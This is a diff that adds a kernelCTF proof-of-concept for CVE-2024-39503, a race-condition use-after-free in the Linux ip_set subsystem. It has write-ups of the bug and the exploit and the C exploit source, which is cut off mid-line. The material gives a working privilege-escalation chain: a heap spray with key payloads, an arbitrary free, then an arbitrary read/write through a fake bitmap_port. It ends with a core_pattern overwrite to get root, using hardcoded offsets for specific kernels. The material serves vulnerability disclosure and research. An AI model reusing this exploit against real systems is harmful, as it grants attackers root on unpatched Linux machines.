diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/exploit.md new file mode 100644 index 00000000..94761feb --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/exploit.md @@ -0,0 +1,311 @@ +# CVE-2024-39503 + +Exploit Documentation for CVE-2024-39503 against lts-6.6.30 / cos-109-17800.218.20 instance. + +## Stage 1: Triggering the vulnerability + +As described in the vulnerability documentation, we are targeting a race condition in the ip set +subsystem. A successful trigger would result in a user-after-free on a `struct ip_set` in +`kmalloc-192`. +```c +/* A generic IP set */ +struct ip_set { + /* For call_cru in destroy */ + struct rcu_head rcu; + /* The name of the set */ + char name[IPSET_MAXNAMELEN]; + /* Lock protecting the set data */ + spinlock_t lock; + /* References to the set */ + u32 ref; + /* References to the set for netlink events like dump, + * ref can be swapped out by ip_set_swap + */ + u32 ref_netlink; + /* The core set type */ + struct ip_set_type *type; + /* The type variant doing the real job */ + const struct ip_set_type_variant *variant; + /* The actual INET family of the set */ + u8 family; + /* The type revision */ + u8 revision; + /* Extensions */ + u8 extensions; // [0.1] + /* Create flags */ + u8 flags; + /* Default timeout value, if enabled */ + u32 timeout; + /* Number of elements (vs timeout) */ + u32 elements; + /* Size of the dynamic extensions (vs timeout) */ + size_t ext_size; + /* Element data size */ + size_t dsize; + /* Offsets to extensions in elements */ + size_t offset[IPSET_EXT_ID_MAX]; // [0.2] + /* The type specific data */ + void *data; // [0.3] +}; +``` + +A successful trigger could result from a scenario which looks like this: +``` + CPU 0 CPU 1 +// cleanup_net() +synchronize_rcu(); ... + + GC runs, list_set_del [1.1] + +ip_set_net_exit [1.2] +< GC is cleaned up > +ip_set_destroy_set [1.3] +< set is free now > ... + +[ spray window ] + + < rcu clean up runs > + __list_set_del_rcu [1.4] + ==> use-after-free +``` + +The general setup for this will be seperated into three processes: +- main: this is the root process which will spawn the spray process and repeat on failure +- spray: spawns the bug trigger process and will perform the heap spray +- bug: sets up the bug trigger in its own namespace which will exit when the process exits + and thus performs one try at hitting the race. + +Because our bug requires interaction with multiple namespaces such "complex" process +structure is sadly required. + +Let's look at each process in more detail. +The main process is not really important for now, its main purpose is to provide a +retry loop. + +The spray process is arguably the most important one. +It runs once for each try of hitting the race. +In the initial stage it will do the following things in order: +1. Prepare the bug trigger process in a new usernamespace +2. Prepare spraying primitives and other post-trigger required setup +3. Signal the bug trigger process to perform one try +4. Wait for the bug trigger process to exit +5. Perform the heap spray and check for success. + +By timing the delay between 4. and 5. in a "good" way, the heap spray will +run concurrently to the namespace cleanup triggered by the bug process. +Special care is taken to assign the CPU cores in order to ensure that the spray +runs on the same core as the trigger. Additionally the cleanup has to run on +another core so that they can run truly concurrently. + +If the bug was triggered successfully _and_ the spray successfully reclaimed one of +the freed sets in time, the `__list_set_del_rcu` cleanup path in [1.4] will +use our sprayed payload and we proceed to the next stage. + +The bug process will try to prepare good conditions for a positive race outcome. +Specifically it will do the following: +Prepare 10 list sets (which introduce the vulnerability), each with a garbage +collector that runs after a 1 second timeout (+- some jiffies). +To each of those sets we add the same one element with a short timeout. +(We choose `bitmap:port` as the element set, for no specific reason) +We do not send this payload straight away, rather pack it into one large netlink +message which will be send all at once to increase control over the timings. +At this point we wait for the signal to trigger the bug. + +With the signal ready, we setup a timer in our process which triggers after a certain +timeout close to 1 second to match the garbage collector. +With the timer setup, we send the full netlink payload actually creating all the +sets and their elements. +We then wait for the timer to expire and exit the process as it happens. + +This way, we force the namespace cleanup to run approximately at the same time +as the garbage collector will run. +The larger number of sets increases our likelyhood of hitting the race for one of +them. + +### Stage 1 Payload Considerations + +Stage 1 is basically a one-shot scenario: We only have a brief time window where +we can reclaim the freed object with a payload in `kmalloc-192`. +Therefore some special considerations are required for the payload. + +Luckily, the RCU callback proves to be very helpful: +```c +static void +__list_set_del_rcu(struct rcu_head * rcu) +{ + struct set_elem *e = container_of(rcu, struct set_elem, rcu); + struct ip_set *set = e->set; // [2.1] + + ip_set_ext_destroy(set, e); // [2.2] + kfree(e); +} + +#define ext_comment(e, s) \ +((struct ip_set_comment *)(((void *)(e)) + (s)->offset[IPSET_EXT_ID_COMMENT])) + +static inline void +ip_set_ext_destroy(struct ip_set *set, void *data) +{ + /* Check that the extension is enabled for the set and + * call it's destroy function for its extension part in data. + */ + if (SET_WITH_COMMENT(set)) { + struct ip_set_comment *c = ext_comment(data, set); // [2.3] + + ip_set_extensions[IPSET_EXT_ID_COMMENT].destroy(set, c); + } +} +``` + +Note that we are spraying a fake set, specifically our payload will correspond +to the set pointer fetched at [2.1]. +Following the call chain [2.2] to `ip_set_ext_destroy` we can modify the set +to contain a comment extension ([0.1]) which will result in the "comment" being +freed. For the `list:set` type, extensions live on the element itself +(i.e. `struct set_elem`) and are referred to by an offset value ([0.2]) which is +stored in the owning set (i.e. our payload). Therefor we can set arbitrary +offsets here and essentially cause an arbitrary free. +To better understand the primitive have a closer look at the comment destroy function: +```c +struct ip_set_comment_rcu { + struct rcu_head rcu; + char str[]; +}; + +struct ip_set_comment { + struct ip_set_comment_rcu __rcu *c; +}; + +static void +ip_set_comment_free(struct ip_set *set, void *ptr) +{ + struct ip_set_comment *comment = ptr; + struct ip_set_comment_rcu *c; + + c = rcu_dereference_protected(comment->c, 1); // [2.4] + if (unlikely(!c)) + return; + set->ext_size -= sizeof(*c) + strlen(c->str) + 1; // [2.5] + kfree_rcu(c, rcu); // [2.6] + rcu_assign_pointer(comment->c, NULL); +} +``` + +It will read the actual comment pointer from offset we specified ([2.4]) and, +given that it is not `NULL`, run a `kfree_rcu` on it ([2.6]). +This means, by choosing the offset in such a way that it adds to a location with +a useful pointer value, we can free that (possibly arbitrary) object. + +The simplest victim object to choose for this is the `*set` itself, as it is +already present on the `struct set_elem` object at offset 32: +```c +/* Member elements */ +struct set_elem { + struct rcu_head rcu; + struct list_head list; + struct ip_set *set; /* Sigh, in order to cleanup reference */ + ip_set_id_t id; +} __aligned(__alignof__(u64)); +``` + +Remember that this set pointer is a pointer to the fake object which we sprayed. +This means we can convert our first stage racy use-after-free into a (possibly) +more stable one. + +Considering all of this, the most versatile payload to perform the stage 1 spray, +seems to be the well known `struct user_key_payload`: + +```c +struct user_key_payload { + struct rcu_head rcu; /* RCU destructor */ + unsigned short datalen; /* length of this data */ + char data[] __aligned(__alignof__(u64)); /* actual data */ +}; +``` + +(It even has a proper RCU head at the correct offset) +To summarize, we spray a `struct user_key_payload` which "looks like" a set with +a comment extension. This extension points to the `*set` member of `struct set_elem` +which in turn points back to the sprayed payload. + +Since the set is modified when the comment is actually deleted ([2.5]), we can +easily detect whether the race was successful by reading back the key. +When this is the case, we continue to stage 2, with a reasonably stable +use-after-free on our key payload. + +## Stage 2: Use-After-Free on Key Payload + +To leverage the use-after-free I chose to simply re-claim the freed key object +with another `struct ip_set` object. +Specifically we will choose a `bitmap:port` set for this. +There are many good reasons for this: +- An ip set has many pointers as members. Since we control a key object we can leak a lot of data. + Specifically this allows us to bypass KASLR via the `type` member. +- It has (indirect) function pointer members, making it a prime candidate for RIP control +- *But most importantly*, by slightly corrupting the original set, we can construct a very simple arbitrary memory write primitive that is much more useful than any RIP control primitive in the first place. + +To better understand the arbitrary write primitive let's have a closer look at +the bitmap ip set type: +```c +/* Type structure */ +struct bitmap_port { + unsigned long *members; /* the set members */ + u16 first_port; /* host byte order, included in range */ + u16 last_port; /* host byte order, included in range */ + u32 elements; /* number of max elements in the set */ + size_t memsize; /* members size */ + struct timer_list gc; /* garbage collection */ + struct ip_set *set; /* attached to this ip_set */ + unsigned char extensions[] /* data extensions */ + __aligned(__alignof__(u64)); +}; +``` + +The general setup for a set consists of the generic `struct ip_set` structure +that contains type specific function templates and a `data` member ([0.3]). +For the `bitmap:port` type, this data member points to a `struct bitmap_port` +structure. +The elements are, as the name suggests, a simple bitmap in the `members` member. +Since elements are merely bits (contrary to the `list:set`) extensions are +directly stored on the type structure (see `extensions` member). +When an element is added to the set, the corresponding bit is set and the +extensions are stored at the given index. +The index for the (port) bitmap is determined by `(port to insert) - first_port`. + +Knowing this, we construct our primitive like so: +1) Create a `bitmap:port` with a 16 byte extension that we can fully control +2) Add a single element to the bitmap as the first member. This allows us to fake + another `struct bitmap_port` header (specifically the `members`, `first_port` + and `last_port` fields) at `offsetof(struct bitmap_port, extensions) == 72` +3) Using our UaF, read the original `struct ip_set` leaking the `data` member +4) Again using our UaF, write back the `struct ip_set`, modifying the `data` member + by adding the offset (i.e. `72`) + +Now we have an bit-level arbitrary read/write primitive through set element +add/remove operations. +(As a side note, an even better choice for this would be something like +`bitmap:ip` since it would allow a broader range compared to the limited `u16` +port type) + +Additionally, step 3) contains an implicit oracle to whether we reclaimed the +key object successfully. The `set->name` member overlaps with the `key.len` member. +By making this "length" longer than the original key, we can observe failure +and deduce a successful spray. +Same thing applies to step 4). Since the set name is modified on success, we can +observe the set not being found when triggering any operations if the following +spray failed. + +With the primitive in place we only need a target to overwrite. +We will use the `core_pattern`, setting it to `|/proc/%P/exe`. +A following segmentation fault in our exploit process will then invoke our exploit +again as the core dump handler which is a straight way out of the jail and to root. + +## Reliability + +The exploit is relatively stable. By default, there is no "comment extension" +(see stage 1), this means if our spray did not succeed we are unlikely to corrupt +anything through the RCU cleanup down the way. +Still, we are targeting a race condition which has its quirks. Specifically +success chances degrade over time as we are trashing the heap more and more. +In my local experiments the exploit was successful ~70-80% though this may vary +depending on the underlying CPU speed, noise, etc. diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/vulnerability.md new file mode 100644 index 00000000..f24cc3f9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/docs/vulnerability.md @@ -0,0 +1,92 @@ +- Requirements: + - Capabilites: CAP_NET_ADMIN + - Kernel configuration: CONFIG_NETFILTER=y, CONFIG_IP_SET=y, CONFIG_IP_SET_LIST_SET=y + - User namespaces required: Yes +- Introduced by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=97f7cf1cd80eeed3b7c808b7c12463295c751001 +- Fixed by: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=4e7aaa6b82d63e8ddcbfb56b4fd3d014ca586f10 +- Affected Version: v6.8- v6.10 +- Affected Component: netfilter, ip_set +- URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-39503 +- Cause: Use-After-Free + +From the patch commit: +There is a race condition between namespace cleanup in ipset and the garbage +collection of the list:set type. The namespace cleanup can destroy the list:set +type of sets while the gc of the set type is waiting to run in rcu cleanup. The +latter uses data from the destroyed set which thus leads to use after free. + +Consider the following code: + +```c +// net/netfilter/ipset/ip_set_core.c: + +static void __net_exit +ip_set_net_exit(struct net *net) +{ + // ... + ip_set(inst, i) = NULL; + set->variant->cancel_gc(set); [1] + ip_set_destroy_set(set); [2] + // ... +} + +static void +ip_set_destroy_set(struct ip_set *set) +{ + // ... + kfree(set); [3] +} +``` + +Along with the following list set specific code: + +```c +// net/netfilter/ipset/ip_set_list_set.c + +static void +__list_set_del_rcu(struct rcu_head * rcu) +{ + struct set_elem *e = container_of(rcu, struct set_elem, rcu); + struct ip_set *set = e->set; + + ip_set_ext_destroy(set, e); [4] + kfree(e); +} + +static void +list_set_del(struct ip_set *set, struct set_elem *e) +{ + struct list_set *map = set->data; + + // ... + call_rcu(&e->rcu, __list_set_del_rcu); [5] +} +``` + +As we can see in [5], the element is about to be destroyed by RCU cleanup in +`__list_set_del_rcu`. However the owning set is still referenced in the cleanup +path [4]. In combination with non-RCU free of the set in [2] and [3] this leads +to a brief time window in which the set may be used after free by the RCU callback. + +This race seems impossible to win on its own, because cleanup paths run in-sync +in [2]. Additionally, the namespace cleanup runs after an RCU synchronization. +But there is an additional user of the set, specifically the GC which runs +periodically and essentially calls [5]. + +This leaves room for the following scenario: +``` +CPU 0 CPU 1 +// cleanup_net() +synchronize_rcu(); + + GC runs, list_set_del [5] + +ip_set_net_exit [2] +< GC is cleaned up > +ip_set_destroy_set [3] +< set is free now > + + < rcu clean up runs > + __list_set_del_rcu [4] + boom, use-after-free +``` diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/Makefile b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/Makefile new file mode 100644 index 00000000..5efefeab --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/Makefile @@ -0,0 +1,3 @@ + +exploit: exploit.c netlink.c + clang -O3 -ggdb -static -Wall -lpthread -DCOS_109_17800_218_20=1 -o $@ $^ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit new file mode 100755 index 00000000..51e6490e Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit.c new file mode 120000 index 00000000..d6739bd7 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/exploit.c @@ -0,0 +1 @@ +../lts-6.6.30/exploit.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.c new file mode 120000 index 00000000..74e5a7c2 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.c @@ -0,0 +1 @@ +../lts-6.6.30/netlink.c \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.h b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.h new file mode 120000 index 00000000..ff0d1948 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/cos-109-17800.218.20/netlink.h @@ -0,0 +1 @@ +../lts-6.6.30/netlink.h \ No newline at end of file diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/Makefile b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/Makefile new file mode 100644 index 00000000..06c31f94 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/Makefile @@ -0,0 +1,3 @@ + +exploit: exploit.c netlink.c + clang -O3 -ggdb -static -Wall -lpthread -DLTS_6_6_30=1 -o $@ $^ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit new file mode 100755 index 00000000..a57d0668 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit differ diff --git a/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit.c b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit.c new file mode 100644 index 00000000..9a08e9c9 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2024-39503_lts_cos/exploit/lts-6.6.30/exploit.c @@ -0,0 +1,742 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +typedef unsigned char u8; +typedef unsigned short u16; +typedef unsigned int u32; +typedef unsigned long long u64; +typedef char i8; +typedef short i16; +typedef int i32; +typedef long long i64; + +#include "netlink.h" + +#define FAIL_IF(x) if ((x)) { \ + perror(#x); \ + return -1; \ +} +#define PANIC_IF(x) if ((x)) { \ + perror(#x); \ + exit(errno); \ +} +#define ARRAY_LEN(x) (sizeof(x) / sizeof(x[0])) + +inline static int _pin_to_cpu(int id) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(id, &set); + return sched_setaffinity(getpid(), sizeof(set), &set); +} + +// +// offsets +// + +// #define LTS_6_6_30 1 +// #define COS_109_17800_218_20 1 + +#if LTS_6_6_30 +u64 core_pattern = 0xffffffff83db4420; +u64 bitmap_port_type = 0xffffffff83eec040; +#elif COS_109_17800_218_20 +u64 core_pattern = 0xffffffff839ba9e0; +u64 bitmap_port_type = 0xffffffff83afb520; +#else +#error "unknown version" +#endif + +#define FOR_ALL_OFFSETS(x) do { \ + x(core_pattern); \ + x(bitmap_port_type) \ + } while(0) + +// +// +// + +static char target_core_pattern[] = "|/proc/%P/exe %P"; + +/* A generic IP set */ +struct ip_set { + /* For call_cru in destroy */ + u8 rcu[16]; + /* The name of the set */ + char name[IPSET_MAXNAMELEN]; + /* Lock protecting the set data */ + u32 lock; + /* References to the set */ + u32 ref; + /* References to the set for netlink events like dump, + * ref can be swapped out by ip_set_swap + */ + u32 ref_netlink; + /* The core set type */ + struct ip_set_type *type; + /* The type variant doing the real job */ + const struct ip_set_type_variant *variant; + /* The actual INET family of the set */ + u8 family; + /* The type revision */ + u8 revision; + /* Extensions */ + u8 extensions; + /* Create flags */ + u8 flags; + /* Default timeout value, if enabled */ + u32 timeout; + /* Number of elements (vs timeout) */ + u32 elements; + /* Size of the dynamic extensions (vs timeout) */ + size_t ext_size; + /* Element data size */ + size_t dsize; + /* Offsets to extensions in elements */ + size_t offset[4]; + /* The type specific data */ + void *data; +}; +_Static_assert(sizeof(struct ip_set) == 152, "ip_set size missmatch"); + +struct bitmap_port { + unsigned long *members; /* the set members */ + u16 first_port; /* host byte order, included in range */ + u16 last_port; /* host byte order, included in range */ + u32 elements; /* number of max elements in the set */ + size_t memsize; /* members size */ + unsigned long gc[5]; /* garbage collection */ + struct ip_set *set; /* attached to this ip_set */ + unsigned char extensions[] /* data extensions */; +}; +_Static_assert(sizeof(struct bitmap_port) == 72, "bitmap_port size missmatch"); + + +union key_payload { + struct ip_set ip_set; + struct { + u8 header[24]; + char data[]; + } key; +}; + +#define MAIN_CPU 0 +#define HELPER_CPU 1 + +#define BUF_SIZE (1024*8) +u8* scratch_buf_try_trigger_bug = NULL; +u8* scratch_buf_spray_fake_set = NULL; + +void* try_trigger_bug_stack = NULL; +void* spray_fake_set_stack = NULL; + +#define SPRAY_ERROR 0 +#define SPRAY_RETRY 1 +#define SPRAY_SUCCESS 2 +volatile int status_spray = SPRAY_ERROR; + +#define __EVENT_SET 0 +#define __EVENT_UNSET 1 + +#define EVENT_DEFINE(name, init) volatile int name = init +#define EVENT_WAIT(name) while (__atomic_exchange_n(&name, __EVENT_UNSET, __ATOMIC_ACQUIRE) != __EVENT_SET) { usleep(1000); } + +#define EVENT_UNSET(name) __atomic_store_n(&name, __EVENT_UNSET, __ATOMIC_RELEASE) +#define EVENT_SET(name) __atomic_store_n(&name, __EVENT_SET, __ATOMIC_RELEASE) + +static void msg_setup(struct nlmsghdr* msg, u16 cmd) { + struct nfgenmsg* data = NLMSG_DATA(msg); + msg->nlmsg_len = NLMSG_HDRLEN + sizeof(*data); + msg->nlmsg_type = (NFNL_SUBSYS_IPSET << 8) | cmd; + msg->nlmsg_flags = NLM_F_REQUEST; + msg->nlmsg_seq = 0; + msg->nlmsg_pid = 0; + + data->nfgen_family = NFPROTO_IPV4; + data->res_id = htons(NFNL_SUBSYS_IPSET); +} + +static void ip_set_add_list_set(struct nlmsghdr* msg, const char* name, u32 gc_interval_sec, u32 cadt_flags) { + msg_setup(msg, IPSET_CMD_CREATE); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + netlink_attr_put(msg, IPSET_ATTR_TYPENAME, "list:set", strlen("list:set") + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + const u8 revision = 3; + netlink_attr_put(msg, IPSET_ATTR_REVISION, &revision, sizeof(revision)); + const u8 fam = NFPROTO_IPV4; + netlink_attr_put(msg, IPSET_ATTR_FAMILY, &fam, sizeof(fam)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + if (gc_interval_sec) { + const u32 timeout = htonl(3 * gc_interval_sec); + netlink_attr_append(sd, IPSET_ATTR_TIMEOUT | NLA_F_NET_BYTEORDER, &timeout, sizeof(timeout)); + } + + if (cadt_flags) { + cadt_flags = htonl(cadt_flags); + netlink_attr_append(sd, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER, &cadt_flags, sizeof(cadt_flags)); + } + + netlink_nest_end(msg, sd); +} + +static void ip_set_add_list_set_elem(struct nlmsghdr* msg, const char* name, const char* elem, u32 timeout_sec) { + msg_setup(msg, IPSET_CMD_ADD); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + netlink_attr_append(sd, IPSET_ATTR_NAME, elem, strlen(elem) + 1); + + const u32 timeout = htonl(timeout_sec); + netlink_attr_append(sd, IPSET_ATTR_TIMEOUT | NLA_F_NET_BYTEORDER, &timeout, sizeof(timeout)); + + netlink_nest_end(msg, sd); +} + +static void ip_set_add_bitmap_port(struct nlmsghdr* msg, const char* name, u16 from, u16 to, u32 cadt_flags) { + msg_setup(msg, IPSET_CMD_CREATE); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + netlink_attr_put(msg, IPSET_ATTR_TYPENAME, "bitmap:port", strlen("bitmap:port") + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + const u8 revision = 3; + netlink_attr_put(msg, IPSET_ATTR_REVISION, &revision, sizeof(revision)); + const u8 fam = NFPROTO_IPV4; + netlink_attr_put(msg, IPSET_ATTR_FAMILY, &fam, sizeof(fam)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + from = htons(from); + netlink_attr_append(sd, IPSET_ATTR_PORT | NLA_F_NET_BYTEORDER, &from, sizeof(from)); + to = htons(to); + netlink_attr_append(sd, IPSET_ATTR_PORT_TO | NLA_F_NET_BYTEORDER, &to, sizeof(to)); + + cadt_flags = htonl(cadt_flags); + netlink_attr_append(sd, IPSET_ATTR_CADT_FLAGS | NLA_F_NET_BYTEORDER, &cadt_flags, sizeof(cadt_flags)); + + netlink_nest_end(msg, sd); +} + +static void ip_set_add_bitmap_port_elem(struct nlmsghdr* msg, const char* name, u16 port, u64 counter0, u64 counter1) { + msg_setup(msg, IPSET_CMD_ADD); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + port = htons(port); + netlink_attr_append(sd, IPSET_ATTR_PORT | NLA_F_NET_BYTEORDER, &port, sizeof(port)); + + counter0 = htobe64(counter0); + netlink_attr_append(sd, IPSET_ATTR_BYTES | NLA_F_NET_BYTEORDER, &counter0, sizeof(counter0)); + counter1 = htobe64(counter1); + netlink_attr_append(sd, IPSET_ATTR_PACKETS | NLA_F_NET_BYTEORDER, &counter1, sizeof(counter1)); + + netlink_nest_end(msg, sd); +} + +static void ip_set_del_bitmap_port_elem(struct nlmsghdr* msg, const char* name, u16 port) { + msg_setup(msg, IPSET_CMD_DEL); + + netlink_attr_put(msg, IPSET_ATTR_SETNAME, name, strlen(name) + 1); + const u8 proto = IPSET_PROTOCOL; + netlink_attr_put(msg, IPSET_ATTR_PROTOCOL, &proto, sizeof(proto)); + + struct nlattr* sd = netlink_nest_begin(msg, IPSET_ATTR_DATA); + + port = htons(port); + netlink_attr_append(sd, IPSET_ATTR_PORT | NLA_F_NET_BYTEORDER, &port, sizeof(port)); + + netlink_nest_end(msg, sd); +} + +static int send_check(int fd, struct nlmsghdr* msg, u32 total_len) { + if (total_len > BUF_SIZE) { + printf("message too large: %u\n", total_len); + abort(); + } + + FAIL_IF(__netlink_send(fd, msg, total_len) < 0); + FAIL_IF(netlink_recv(fd, msg, BUF_SIZE) < 0); + return netlink_errno(msg); +} + +u64 get_jiffies() { + return times(NULL) * 10; +} + +typedef int key_serial_t; + +inline static key_serial_t add_key(const char *type, const char *description, const void *payload, size_t plen, key_serial_t ringid) { + return syscall(__NR_add_key, type, description, payload, plen, ringid); +} + +long keyctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { + return syscall(__NR_keyctl, option, arg2, arg3, arg4, arg5); +} + +void synchronize_rcu() { + // A synchronize_rcu primitive in userspace: Original idea from https://github.com/lrh2000/StackRot + if (syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0, -1) < 0) { + perror("membarrier()"); + } +} + +#define NS_PER_JIFFIE 1000000ull + +EVENT_DEFINE(trigger_bug, __EVENT_UNSET); +int try_trigger_bug(void*); + +int spray_fake_set(void* arg) { + status_spray = SPRAY_ERROR; + int notify_fd = *(int*)arg; + + int bug_worker_pid = clone(try_trigger_bug, try_trigger_bug_stack, CLONE_NEWUSER | CLONE_NEWNET | CLONE_VM | SIGCHLD, NULL); + FAIL_IF(bug_worker_pid < 0); + + // bug triggering is now happening concurrently. We use the time to prepare our heap spray + + FAIL_IF(unshare(CLONE_NEWUSER | CLONE_NEWNET | CLONE_NEWNS) < 0); + + union key_payload payload = {}; + const size_t payload_size = sizeof(payload.ip_set) - sizeof(payload.key.header); + union key_payload readout = {}; + key_serial_t keys[256] = {}; + + struct itimerspec it = {}; + int tfd; + + FAIL_IF((tfd = timerfd_create(CLOCK_MONOTONIC, 0)) < 0); + + memset(&payload, '?', sizeof(payload)); + + // we only need to set the comment extension + #define IPSET_EXT_COMMENT 4 + payload.ip_set.extensions = IPSET_EXT_COMMENT; + + #define IPSET_EXT_ID_COMMENT 3 + // point it to the set* member (i.e. point back to the object we sprayed) + payload.ip_set.offset[IPSET_EXT_ID_COMMENT] = 32; + + EVENT_SET(trigger_bug); + + _pin_to_cpu(MAIN_CPU); + + // Now wait for the child to exit, signaling that ns exit is triggered and we can start the spray + FAIL_IF(waitpid(bug_worker_pid, NULL, 0) < 0); + + struct timespec t0; + clock_gettime(CLOCK_MONOTONIC, &t0); + + // now that the child exited, wait for a short grace period until the ns cleanup runs + u64 tmp; + it.it_value.tv_sec = 0; + it.it_value.tv_nsec = 50 * NS_PER_JIFFIE; + FAIL_IF(timerfd_settime(tfd, 0, &it, NULL) < 0); + + read(tfd, &tmp, sizeof(tmp)); + + struct timespec t1; + clock_gettime(CLOCK_MONOTONIC, &t1); + + u64 begin = get_jiffies(); + + // now we spray our sets. hopefully the stars align and we a) hit the race + // and b) reclaim the set with a newly prepared one + + do { + // quota: 20'000 + // sizeof(ip_set) = 152 + // 20'000 / 152 = 131 + + // one round of spraying, racing the exit handler + for (int i = 0; i < 128; i++) { + // adding a brief delay here seemed to improve race timings + u64 _t0 = __rdtsc(); + while((__rdtsc() - _t0) < 1000) {} + + if (keys[i]) { + FAIL_IF(keyctl(KEYCTL_UPDATE, keys[i], (unsigned long)&payload.key.data, payload_size, 0) < 0) + } else { + char desc[16] = {}; + snprintf(desc, sizeof(desc) - 1, "-%d", i); + + key_serial_t id = add_key("user", desc, &payload.key.data, payload_size, KEY_SPEC_PROCESS_KEYRING); + FAIL_IF(id < 0); + + keys[i] = id; + } + } + + synchronize_rcu(); + + // check for success + for (int i = 0; i < 128; i++) { + FAIL_IF(keyctl(KEYCTL_READ, keys[i], (unsigned long)&readout.key.data, payload_size, 0) < 0); + + // our payload was all '?' initially + if (readout.ip_set.ext_size != 0x3f3f3f3f3f3f3f3f) { + printf("race success: key = %d!\n", keys[i]); + + // now we have a somewhat stable UaF on the key + key_serial_t k = keys[i]; + + int nfd; + FAIL_IF((nfd = netlink_open(NETLINK_NETFILTER)) < 0); + + // wait for free of k + synchronize_rcu(); + + struct nlmsghdr* msg; + u32 total_len; + + int name_idx = 0; + char list_set_name[12 + 4 + 1] = { + '\1', '\1', // the name overlaps with the key.datalen member. Choose some low value > 0 + 'P','P','P','P','P','P', // 6 bytes padding + '$','$','$','$' // a unique name to monitor success + }; + + while (1) { + // we now reclaim the key with another set object + total_len = 0; + msg = (void*)scratch_buf_spray_fake_set; + bzero(scratch_buf_spray_fake_set, BUF_SIZE); + + for (int j = 0; j < 16; j++) { + snprintf(&list_set_name[12], 4 + 1, "%04x", name_idx++); + // we want counters to be able to prepare a fake bitmap_port structure + // we need a range of sizeof(struct bitmap_port) / sizeof(counters) = 5 ports + // BUT we actually only touch the first 16 bytes so one port is enough + // if we run into problems we should increase the range to be sufficiently large to + // not flood the kmalloc-192 cache where our set is in + ip_set_add_bitmap_port(msg, list_set_name, 9000, 9000/* + 15*/, IPSET_FLAG_WITH_COUNTERS); + total_len += msg->nlmsg_len; + msg = nlmsg_end(msg); + } + + FAIL_IF(send_check(nfd, (void*)scratch_buf_spray_fake_set, total_len) != 0); + + FAIL_IF(keyctl(KEYCTL_READ, k, (unsigned 